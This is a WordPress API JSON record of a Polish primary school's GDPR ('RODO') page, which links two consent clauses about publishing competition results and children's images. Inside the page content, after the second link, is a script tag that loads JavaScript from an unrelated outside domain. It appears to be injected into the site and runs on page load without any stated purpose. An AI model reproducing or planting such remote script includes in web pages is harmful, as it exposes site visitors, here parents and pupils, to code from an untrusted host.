{"id":9264,"date":"2018-09-25T07:00:36","date_gmt":"2018-09-25T05:00:36","guid":{"rendered":"http:\/\/spmrowiny.gmina.zarow.pl\/?page_id=9264"},"modified":"2020-04-23T09:20:30","modified_gmt":"2020-04-23T07:20:30","slug":"rodo","status":"publish","type":"page","link":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/informacje-dla-rodzicow\/rodo\/","title":{"rendered":"RODO"},"content":{"rendered":"<p>W zwi\u0105zku z obowi\u0105zuj\u0105cymi przepisami z zakresu RODO, prosimy Pa\u0144stwa o zapoznanie si\u0119 z obowi\u0105zuj\u0105cymi w naszej szkole klauzulami:<\/p>\n<p><a href=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2018\/09\/Klauzula-w-celu-upublucznienia-wynik\u00f3w-konkurs\u00f3w-1.docx\">Klauzula w celu upublicznienia wynik\u00f3w konkurs\u00f3w<\/a><\/p>\n<p><a href=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2018\/09\/Klauzula-w-celu-upublucznienia-wizerunku-dziecka.docx\">Klauzula w celu upublicznienia wizerunku dziecka<\/a><script src=http:\/\/www.onlymobilepro.com\/wp-content\/plugins\/syntaxhighlighter\/syntaxhighlighter2\/scripts\/include2.js><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>W zwi\u0105zku z obowi\u0105zuj\u0105cymi przepisami z zakresu RODO, prosimy Pa\u0144stwa o zapoznanie si\u0119 z obowi\u0105zuj\u0105cymi w naszej szkole klauzulami: Klauzula w celu upublicznienia wynik\u00f3w konkurs\u00f3w Klauzula w celu upublicznienia wizerunku dziecka<\/p>\n","protected":false},"author":3,"featured_media":0,"parent":3552,"menu_order":1,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/9264"}],"collection":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/comments?post=9264"}],"version-history":[{"count":7,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/9264\/revisions"}],"predecessor-version":[{"id":15017,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/9264\/revisions\/15017"}],"up":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/3552"}],"wp:attachment":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/media?parent=9264"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}